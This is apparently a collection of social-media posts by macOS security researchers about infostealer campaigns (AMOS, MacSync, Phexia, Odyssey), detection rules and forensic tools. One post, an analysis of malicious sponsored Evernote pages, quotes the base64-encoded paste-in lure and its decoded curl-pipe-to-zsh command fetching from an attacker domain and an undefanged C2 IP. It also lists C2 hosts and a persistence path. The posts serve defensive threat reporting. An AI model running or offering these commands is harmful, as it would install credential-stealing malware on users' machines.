Stuart Ashenbrenner 🇺🇸 🇨🇦

New AMOS campaign details. Attackers are using a phishing page hosted on sites.google.com, tricking users into executing a malicious command in Terminal: hxxps://api-metrics-5453[.]com/curl/3e97b0eddfddb28e10008f9348381b2665e1ad12476315b24a64808696c3347b The bash script downloads and launches the next-stage stager: “helper”. “helper” is a heavily obfuscated loader/dropper. It does not steal data directly, but prepares and launches the next stage (AMOS stealer + backdoor). The rest you already know. Infrastructure: api-metrics-5453[.]com — first stage prismdata48[.]com — Phishing site solidlattice65[.]com — Phishing site #AMOS #STEALER #macOS #malware #detection

Spent some time with Claude this weekend making an Endpoint Security reference for research and development. Checks for the latest SDK, parses the ES headers, and publishes. Includes a dedicated ES change log and telemetry matrix. esapi.swiftlydetecting.com

Follow our research with the new @JamfThreatLabs handle! We may also share some additional intel on the macOS threat landscape from time to time!

🧵 The axios @npmjs compromise dropped a @macOS backdoor that closely mirrors North Korea's (@DPRK) recent WAVESHAPER backdoor. Let's take a quick look the full intrusion:

You can now build macOS firewalls/network tools via Endpoint Security - no Network Ext. needed! 🤯 Reversing macOS 24.6’s new ES_EVENT_TYPE_RESERVED_* ES events shows some are network auth/notify hooks Read: “Building a Firewall…via Endpoint Security!?” objective-see.org/blog/blog_0x86…

In macOS Tahoe 26.4 Apple added a new security feature to Terminal that warns users of potentially malicious pastes with a "Possible malware, Paste blocked" prompt. Here how it actually works 🧵

I've exited from tech and am doing guided tours in and around Yellowstone. backroadsbear.com Thanks to everyone for some great years! This will be my last post here. 🐬

DFIR analysts who use macOS as their daily driver deserve free and native forensic tooling. So I built one. 🍎 Introducing 𝗜𝗥𝗙𝗹𝗼𝘄 𝗧𝗶𝗺𝗲𝗹𝗶𝗻𝗲 — a timeline analysis app built from the ground up for Mac-based DFIR folks, forensic investigators, or SOC analysts. Built in appreciation of, and inspired by, Eric Zimmerman’s Timeline Explorer. Every feature in this tool was shaped by real IR casework. Handling massive timelines, parsing artifacts here and there, and pivoting across logs during active investigations. I built IRFlow Timeline to be the native macOS timeline analyzer that actually keeps up with a live case. Every button and view is intentional; if it’s in the app, it’s because I needed it mid-case and realized the standard tools fell short. No dependencies. Zero setup. Just drag, drop, and analyze. #dfir #incidentresponse #timeline #macos #threathunitng #digitalforensics

Apple dropping some XProtect updates (v5331) which seem to be every couple of Tuesdays. The new yara rules which look at some AMOS stealers are really interesting in that they're looking at the assembly instructions and the script-based stuff continues to move into XPScripts.yr.

Jamf Threat Labs team always dropping the dopest tools 💜 awesome work @txhaflaire

Hunting for MacOS malware🍎with @osint_barbie revealed how threat actors are now leveraging different malware solutions at the same time on the same payload, in this case, MacSync Stealer + Phexia Botnet for persistence Malicious @evernote results with fake installations guides are being sponsored on Google for common searches like homebrew leading the user to copy paste and run a malicious command (image 1) lite.evernote[.]com/note/c548d6e8-22e3-d45c-b0d2-2ac5ecbd8964 Like usual, payload is base64 encoded echo 'ZWNobyAnSW5zdGFsbGluZyBwYWNrYWdlIHBsZWFzZSB3YWl0Li4uJzsgY3VybCAta2ZzU0wgaHR0cDovL29udGFyaW9xdWFsaXR5Y2VkYXIuY29tL2N1cmwvYTBlZDBiZjg4MTY0YjA5NTYwZjM1ODQ2MjI3MWM2YTZlNzFkMjYxMWRiNjNkODVlYmFhZTkwYjI0OWJlOWYyOCB8IHpzaDsgY3VybCAta2ZzU0wgaHR0cDovLzEzOC4xMjQuMTguOS92IHwgYmFzaA==' | base64 -D | zsh decoded curl -kfsSL http://ontarioqualitycedar[.]com/curl/a0ed0bf88164b09560f358462271c6a6e71d2611db63d85ebaae90b249be9f28 | zsh; curl -kfsSL http://138.124.18.9/v and we can already observe the two different malware solutions being leveraged 1. MacSync Stealer As it is usual, URL http://ontarioqualitycedar[.]com/curl/a0ed0bf88164b09560f358462271c6a6e71d2611db63d85ebaae90b249be9f28 will provide a bash script with a b64 + gunzip encoding, in charge of fetching infostealer applescript, executing it and uploading victim log to C2 (image 2) There is not really much newer on this as what is seen before, just that now MacSync scripts uploads the log by splitting the file in 10mb chunks, probably to avoid data loses in big sized logs MacSync bash Script -> f5a3fcc5f5d4754d7262f55ac0a4519af15f93bba847e986a1660820bad1caef 2. Phexia Botnet Interesting part of this post is that a second payload is being executed sequentially as part of a different malware solution to create persistence on the MacOS infected machine From C2 138.124.18.9/v , a b64-encoded apple script is fetched. In this case, it creates LaunchAgent persistence using a plist in ~/Library/LaunchAgents/com.bashsrc.ixxjeiijvivzovon.plist with a b64 applescript content This second payload, nothing far from what is has been seen before, is the responsible to fetch a Phexia Botnet live C2 from t[.]me/phefuckxiabot or if failed, harcoded values (kys[.]cx and kys[.]li), grab and execute Phexia Botnet applescript, which manages to grab specs from the machine and waits until a task is loaded to be executed in the infected machine (image 3) Phexia AppleScript -> 618bff4f4d090ff802d8009dc97a89723757bd179e5cab069fb33c5ec7de61c2 Sponsored results are being paid by different, likely compromised, advertisers (image 4) Transparency users - AR01249564419160014849, AR13446608053252128769, AR06288543453827563521, AR03671228110637891585 By analysing the advertisers, you can already see other active ads sponsoring other malicious Evernote results for MacOS applications or fake command solutions for Transmission, OnyX, Rectangle, Final Cut Pro, PearCleaner, DropOver, 7zip, Flush DNS, NFTS, AppCleaner, OBS, CrossOver, Unarchiver, Open Source Office, Microsoft Office or VLC Player, among others.

1/ We’re tracking a fresh wave of #Odyssey #Stealer activity targeting #macOS users. Over the past days, our telemetry showed newly updated samples spreading primarily across: 🇺🇸 United States 🇫🇷 France 🇪🇸 Spain Today, the picture has clearly changed: the same Odyssey campaign is now affecting users in additional regions, including: 🇬🇧 United Kingdom 🇩🇪 Germany 🇮🇹 Italy 🇨🇦 Canada 🇧🇷 Brazil 🇮🇳 India 🌏Multiple countries across Africa and Asia Two map screenshots, taken only one day apart, highlight a rapidly expanding geographic footprint. Odyssey stealer samples in this campaign appear to be auto-generated, producing many unique hashes with the same size and functionality. See IOCs in the next one below👇

This is an important update to osascript detection on macOS. As @howardnoakley stated, 12 rules were added including one for compiled osascript. These rules appear to provide coverage for many of the common infostealers we see targeting macOS. Let's take a look at a couple🧵

@moonlock_lab @malwrhunterteam I love that now they're trying to even side-step the 'Right-Click + Open' social engineering technique.

@malwrhunterteam An interesting one, thanks for sharing here! According to internals, looks like Odyssey stealer.

"Neuravision.dmg": ea6f39158671ff940a94c433c354e7d27b885ca2d57ce205f87e47f17f934055 🤷‍♂️

1/ After Mosyle shared details of the macOS malware campaign dubbed #SimpleStealth (reported by @arinwaichulis 9to5mac.com/2026/01/09/mos…), spreading via a fake @grok app, we took a closer look at the sample and found it attempting to terminate macOS security and monitoring tools🧵

i did a blog tangentially about digitstealer izzyboop.com/posts/Get-gud-…

Are you using Visual Studio Code? Then this new blog from Jamf Threat Labs might have some takeaways for you! In this blog, we’ll shed light on newer techniques being used by DPRK-linked threat actors related to Contagious Interview, including a newly observed backdoor component. jamf.com/blog/threat-ac… #malware #git #macos #ThreatHunting #jamf

@stuartjash, Chris Ryan, and I have the incredible opportunity/privilege at helping build the @HuntressLabs EDR products. Although we all work on a different OS for these products, one thing we try to drive for our customers is parity. That comes with a handful of challenges as one might imagine. Today, the 3 of us are dropping a blog that goes over the desire to chase parity across these products. Blog: huntress.com/blog/pursuing-… Note: Expect to see more blogs like this, this year. We are driving some really cool features that can replicate across different operating systems.

@PeteMarkowsky @L0Psec @birchb0y Yessir!

@L0Psec @stuartjash @birchb0y That was the one that used the debug entitlements in it's base app right?

These are always a great read. A lot of interesting ones last year. Great opportunity to grab samples and play around with macOS malware. My favorite was the BlueNoroff one (process injection!) @stuartjash and @birchb0y :)

🎉 A decade of Mac malware research 🎉 Just published our 10th annual “The Mac Malware of <year>” report ...2025 edition! For each new sample of 2025, covers: 🔎 IoCs 💉 Infection 💾 Persistence 📡 Capabilities ☣️ Samples for download Dive in 👇 objective-see.org/blog/blog_0x84…